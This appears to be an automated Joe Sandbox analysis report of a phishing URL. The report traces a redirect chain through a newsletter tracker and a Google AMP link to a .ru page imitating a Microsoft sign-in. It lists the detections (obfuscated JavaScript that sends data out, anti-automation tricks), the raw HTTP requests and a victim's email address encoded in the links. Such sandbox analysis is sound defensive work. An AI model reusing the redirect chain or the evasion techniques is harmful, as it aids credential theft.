Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i

Overview

General Information

Sample URL:https://t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJ
Analysis ID:1585189
Infos:

Detection

HTMLPhisher
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected HtmlPhish44
AI detected suspicious Javascript
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6380 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6908 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1948,i,14907547399689910483,310320339448352064,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6724 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogo" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_122JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://y7.novenef.ru/Lj9e/Avira URL Cloud: Label: phishing
    Source: https://y7.novenef.ru/favicon.icoAvira URL Cloud: Label: phishing

    Phishing

    barindex
    Source: Yara matchFile source: dropped/chromecache_122, type: DROPPED
    Source: 1.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://y7.novenef.ru/Lj9e/#Aphil.lessard@modula.c... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common keyboard shortcuts, and redirecting the user to a suspicious domain. The script also includes obfuscated code and a debugger trap, which are common techniques used in malicious scripts. Overall, this script demonstrates a clear intent to interfere with the user's browsing experience and potentially compromise their security, making it a high-risk threat.
    Source: 1.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://y7.novenef.ru/Lj9e/#Aphil.lessard@modula.c... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While the script may have some legitimate functionality, the overall risk level is high due to the presence of these malicious indicators.
    Source: 1.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://y7.novenef.ru/Lj9e/#Aphil.lessard@modula.c... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script uses the `fetch` API to send user data to an unknown domain, and it also redirects the user to the Microsoft login page in certain scenarios, which is highly suspicious. Additionally, the script contains obfuscated code and URLs, further increasing the risk. Overall, this script demonstrates clear malicious intent and should be considered a high-risk threat.
    Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718352416588474.MjU1ZDE4MmYtNWY0My00NjVjLTkxNmUtOGNjNThkNDI5NzRlNGEzMjk1NjMtMmQzZi00ZjNhLWFjYzEtMjdjODJlODA0N2U2&ui_locales=en-US&mkt=en-US&client-request-id=40b69091-fbe7-4db8-b775-f022010263cb&state=ZfpYkt9gdaR9OJEvLz3buZTebDKFIuPnVK9NVInJPAJGq-wSrG3eAOhAoxPFz6beoHvbULTcAeAHxkFicqY5FEcAJkCYP3yyTJ1pmhXffV2ta_TRNYmxvPFU2Yp751cuLcCNP9FR6wjj323E1RxFhCZF68ZKgLexDe4X1pPSecf9vu_jOS9Tt12g_APf0CJ1IaDeNIE1ekN5Nu5wKmRAuj-wE0iHFN-EpnIUKnntHC9P-Qopwhz9zN53-COJ94ibv1Xf_yTXqNrBFnmTwJwVZA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
    Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718352416588474.MjU1ZDE4MmYtNWY0My00NjVjLTkxNmUtOGNjNThkNDI5NzRlNGEzMjk1NjMtMmQzZi00ZjNhLWFjYzEtMjdjODJlODA0N2U2&ui_locales=en-US&mkt=en-US&client-request-id=40b69091-fbe7-4db8-b775-f022010263cb&state=ZfpYkt9gdaR9OJEvLz3buZTebDKFIuPnVK9NVInJPAJGq-wSrG3eAOhAoxPFz6beoHvbULTcAeAHxkFicqY5FEcAJkCYP3yyTJ1pmhXffV2ta_TRNYmxvPFU2Yp751cuLcCNP9FR6wjj323E1RxFhCZF68ZKgLexDe4X1pPSecf9vu_jOS9Tt12g_APf0CJ1IaDeNIE1ekN5Nu5wKmRAuj-wE0iHFN-EpnIUKnntHC9P-Qopwhz9zN53-COJ94ibv1Xf_yTXqNrBFnmTwJwVZA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
    Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718352416588474.MjU1ZDE4MmYtNWY0My00NjVjLTkxNmUtOGNjNThkNDI5NzRlNGEzMjk1NjMtMmQzZi00ZjNhLWFjYzEtMjdjODJlODA0N2U2&ui_locales=en-US&mkt=en-US&client-request-id=40b69091-fbe7-4db8-b775-f022010263cb&state=ZfpYkt9gdaR9OJEvLz3buZTebDKFIuPnVK9NVInJPAJGq-wSrG3eAOhAoxPFz6beoHvbULTcAeAHxkFicqY5FEcAJkCYP3yyTJ1pmhXffV2ta_TRNYmxvPFU2Yp751cuLcCNP9FR6wjj323E1RxFhCZF68ZKgLexDe4X1pPSecf9vu_jOS9Tt12g_APf0CJ1IaDeNIE1ekN5Nu5wKmRAuj-wE0iHFN-EpnIUKnntHC9P-Qopwhz9zN53-COJ94ibv1Xf_yTXqNrBFnmTwJwVZA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: 255d182f-5f43-465c-916e-8cc58d42974e4a329563-2d3f-4f3a-acc1-27c82e8047e6
    Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718352416588474.MjU1ZDE4MmYtNWY0My00NjVjLTkxNmUtOGNjNThkNDI5NzRlNGEzMjk1NjMtMmQzZi00ZjNhLWFjYzEtMjdjODJlODA0N2U2&ui_locales=en-US&mkt=en-US&client-request-id=40b69091-fbe7-4db8-b775-f022010263cb&state=ZfpYkt9gdaR9OJEvLz3buZTebDKFIuPnVK9NVInJPAJGq-wSrG3eAOhAoxPFz6beoHvbULTcAeAHxkFicqY5FEcAJkCYP3yyTJ1pmhXffV2ta_TRNYmxvPFU2Yp751cuLcCNP9FR6wjj323E1RxFhCZF68ZKgLexDe4X1pPSecf9vu_jOS9Tt12g_APf0CJ1IaDeNIE1ekN5Nu5wKmRAuj-wE0iHFN-EpnIUKnntHC9P-Qopwhz9zN53-COJ94ibv1Xf_yTXqNrBFnmTwJwVZA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
    Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718352416588474.MjU1ZDE4MmYtNWY0My00NjVjLTkxNmUtOGNjNThkNDI5NzRlNGEzMjk1NjMtMmQzZi00ZjNhLWFjYzEtMjdjODJlODA0N2U2&ui_locales=en-US&mkt=en-US&client-request-id=40b69091-fbe7-4db8-b775-f022010263cb&state=ZfpYkt9gdaR9OJEvLz3buZTebDKFIuPnVK9NVInJPAJGq-wSrG3eAOhAoxPFz6beoHvbULTcAeAHxkFicqY5FEcAJkCYP3yyTJ1pmhXffV2ta_TRNYmxvPFU2Yp751cuLcCNP9FR6wjj323E1RxFhCZF68ZKgLexDe4X1pPSecf9vu_jOS9Tt12g_APf0CJ1IaDeNIE1ekN5Nu5wKmRAuj-wE0iHFN-EpnIUKnntHC9P-Qopwhz9zN53-COJ94ibv1Xf_yTXqNrBFnmTwJwVZA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
    Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718352416588474.MjU1ZDE4MmYtNWY0My00NjVjLTkxNmUtOGNjNThkNDI5NzRlNGEzMjk1NjMtMmQzZi00ZjNhLWFjYzEtMjdjODJlODA0N2U2&ui_locales=en-US&mkt=en-US&client-request-id=40b69091-fbe7-4db8-b775-f022010263cb&state=ZfpYkt9gdaR9OJEvLz3buZTebDKFIuPnVK9NVInJPAJGq-wSrG3eAOhAoxPFz6beoHvbULTcAeAHxkFicqY5FEcAJkCYP3yyTJ1pmhXffV2ta_TRNYmxvPFU2Yp751cuLcCNP9FR6wjj323E1RxFhCZF68ZKgLexDe4X1pPSecf9vu_jOS9Tt12g_APf0CJ1IaDeNIE1ekN5Nu5wKmRAuj-wE0iHFN-EpnIUKnntHC9P-Qopwhz9zN53-COJ94ibv1Xf_yTXqNrBFnmTwJwVZA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
    Source: https://y7.novenef.ru/Lj9e/#Aphil.lessard@modula.comHTTP Parser: No favicon
    Source: https://y7.novenef.ru/Lj9e/#Aphil.lessard@modula.comHTTP Parser: No favicon
    Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718352416588474.MjU1ZDE4MmYtNWY0My00NjVjLTkxNmUtOGNjNThkNDI5NzRlNGEzMjk1NjMtMmQzZi00ZjNhLWFjYzEtMjdjODJlODA0N2U2&ui_locales=en-US&mkt=en-US&client-request-id=40b69091-fbe7-4db8-b775-f022010263cb&state=ZfpYkt9gdaR9OJEvLz3buZTebDKFIuPnVK9NVInJPAJGq-wSrG3eAOhAoxPFz6beoHvbULTcAeAHxkFicqY5FEcAJkCYP3yyTJ1pmhXffV2ta_TRNYmxvPFU2Yp751cuLcCNP9FR6wjj323E1RxFhCZF68ZKgLexDe4X1pPSecf9vu_jOS9Tt12g_APf0CJ1IaDeNIE1ekN5Nu5wKmRAuj-wE0iHFN-EpnIUKnntHC9P-Qopwhz9zN53-COJ94ibv1Xf_yTXqNrBFnmTwJwVZA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
    Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718352416588474.MjU1ZDE4MmYtNWY0My00NjVjLTkxNmUtOGNjNThkNDI5NzRlNGEzMjk1NjMtMmQzZi00ZjNhLWFjYzEtMjdjODJlODA0N2U2&ui_locales=en-US&mkt=en-US&client-request-id=40b69091-fbe7-4db8-b775-f022010263cb&state=ZfpYkt9gdaR9OJEvLz3buZTebDKFIuPnVK9NVInJPAJGq-wSrG3eAOhAoxPFz6beoHvbULTcAeAHxkFicqY5FEcAJkCYP3yyTJ1pmhXffV2ta_TRNYmxvPFU2Yp751cuLcCNP9FR6wjj323E1RxFhCZF68ZKgLexDe4X1pPSecf9vu_jOS9Tt12g_APf0CJ1IaDeNIE1ekN5Nu5wKmRAuj-wE0iHFN-EpnIUKnntHC9P-Qopwhz9zN53-COJ94ibv1Xf_yTXqNrBFnmTwJwVZA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
    Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718352416588474.MjU1ZDE4MmYtNWY0My00NjVjLTkxNmUtOGNjNThkNDI5NzRlNGEzMjk1NjMtMmQzZi00ZjNhLWFjYzEtMjdjODJlODA0N2U2&ui_locales=en-US&mkt=en-US&client-request-id=40b69091-fbe7-4db8-b775-f022010263cb&state=ZfpYkt9gdaR9OJEvLz3buZTebDKFIuPnVK9NVInJPAJGq-wSrG3eAOhAoxPFz6beoHvbULTcAeAHxkFicqY5FEcAJkCYP3yyTJ1pmhXffV2ta_TRNYmxvPFU2Yp751cuLcCNP9FR6wjj323E1RxFhCZF68ZKgLexDe4X1pPSecf9vu_jOS9Tt12g_APf0CJ1IaDeNIE1ekN5Nu5wKmRAuj-wE0iHFN-EpnIUKnntHC9P-Qopwhz9zN53-COJ94ibv1Xf_yTXqNrBFnmTwJwVZA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
    Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718352416588474.MjU1ZDE4MmYtNWY0My00NjVjLTkxNmUtOGNjNThkNDI5NzRlNGEzMjk1NjMtMmQzZi00ZjNhLWFjYzEtMjdjODJlODA0N2U2&ui_locales=en-US&mkt=en-US&client-request-id=40b69091-fbe7-4db8-b775-f022010263cb&state=ZfpYkt9gdaR9OJEvLz3buZTebDKFIuPnVK9NVInJPAJGq-wSrG3eAOhAoxPFz6beoHvbULTcAeAHxkFicqY5FEcAJkCYP3yyTJ1pmhXffV2ta_TRNYmxvPFU2Yp751cuLcCNP9FR6wjj323E1RxFhCZF68ZKgLexDe4X1pPSecf9vu_jOS9Tt12g_APf0CJ1IaDeNIE1ekN5Nu5wKmRAuj-wE0iHFN-EpnIUKnntHC9P-Qopwhz9zN53-COJ94ibv1Xf_yTXqNrBFnmTwJwVZA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
    Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718352416588474.MjU1ZDE4MmYtNWY0My00NjVjLTkxNmUtOGNjNThkNDI5NzRlNGEzMjk1NjMtMmQzZi00ZjNhLWFjYzEtMjdjODJlODA0N2U2&ui_locales=en-US&mkt=en-US&client-request-id=40b69091-fbe7-4db8-b775-f022010263cb&state=ZfpYkt9gdaR9OJEvLz3buZTebDKFIuPnVK9NVInJPAJGq-wSrG3eAOhAoxPFz6beoHvbULTcAeAHxkFicqY5FEcAJkCYP3yyTJ1pmhXffV2ta_TRNYmxvPFU2Yp751cuLcCNP9FR6wjj323E1RxFhCZF68ZKgLexDe4X1pPSecf9vu_jOS9Tt12g_APf0CJ1IaDeNIE1ekN5Nu5wKmRAuj-wE0iHFN-EpnIUKnntHC9P-Qopwhz9zN53-COJ94ibv1Xf_yTXqNrBFnmTwJwVZA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
    Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718352416588474.MjU1ZDE4MmYtNWY0My00NjVjLTkxNmUtOGNjNThkNDI5NzRlNGEzMjk1NjMtMmQzZi00ZjNhLWFjYzEtMjdjODJlODA0N2U2&ui_locales=en-US&mkt=en-US&client-request-id=40b69091-fbe7-4db8-b775-f022010263cb&state=ZfpYkt9gdaR9OJEvLz3buZTebDKFIuPnVK9NVInJPAJGq-wSrG3eAOhAoxPFz6beoHvbULTcAeAHxkFicqY5FEcAJkCYP3yyTJ1pmhXffV2ta_TRNYmxvPFU2Yp751cuLcCNP9FR6wjj323E1RxFhCZF68ZKgLexDe4X1pPSecf9vu_jOS9Tt12g_APf0CJ1IaDeNIE1ekN5Nu5wKmRAuj-wE0iHFN-EpnIUKnntHC9P-Qopwhz9zN53-COJ94ibv1Xf_yTXqNrBFnmTwJwVZA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
    Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718352416588474.MjU1ZDE4MmYtNWY0My00NjVjLTkxNmUtOGNjNThkNDI5NzRlNGEzMjk1NjMtMmQzZi00ZjNhLWFjYzEtMjdjODJlODA0N2U2&ui_locales=en-US&mkt=en-US&client-request-id=40b69091-fbe7-4db8-b775-f022010263cb&state=ZfpYkt9gdaR9OJEvLz3buZTebDKFIuPnVK9NVInJPAJGq-wSrG3eAOhAoxPFz6beoHvbULTcAeAHxkFicqY5FEcAJkCYP3yyTJ1pmhXffV2ta_TRNYmxvPFU2Yp751cuLcCNP9FR6wjj323E1RxFhCZF68ZKgLexDe4X1pPSecf9vu_jOS9Tt12g_APf0CJ1IaDeNIE1ekN5Nu5wKmRAuj-wE0iHFN-EpnIUKnntHC9P-Qopwhz9zN53-COJ94ibv1Xf_yTXqNrBFnmTwJwVZA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.co.nz to http://yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cghpbc5szxnzyxjkqg1vzhvsys5jb20=
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogo HTTP/1.1Host: t1.a.editions-legislatives.frConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogo HTTP/1.1Host: www.google.co.nzConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20= HTTP/1.1Host: www.google.co.nzConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=LVcWUJwgx6KapFVhpgJ7Eo-DWc9UXuY6dAPr8IHEXhIcHEhyagOSMUoALBVVMlMEGD8TfxFva-K8usx04PDoWB4IY3gg91E2Nr0KCzmNCIf8y5FV5mgZM3b3ryzZ6PVk3H_vXtkaE2FkWUtmy8-S3bRWjxtsVbar735DbkGV30jR1T5wi64fvvFl5xTECBK4Rh3gaQ
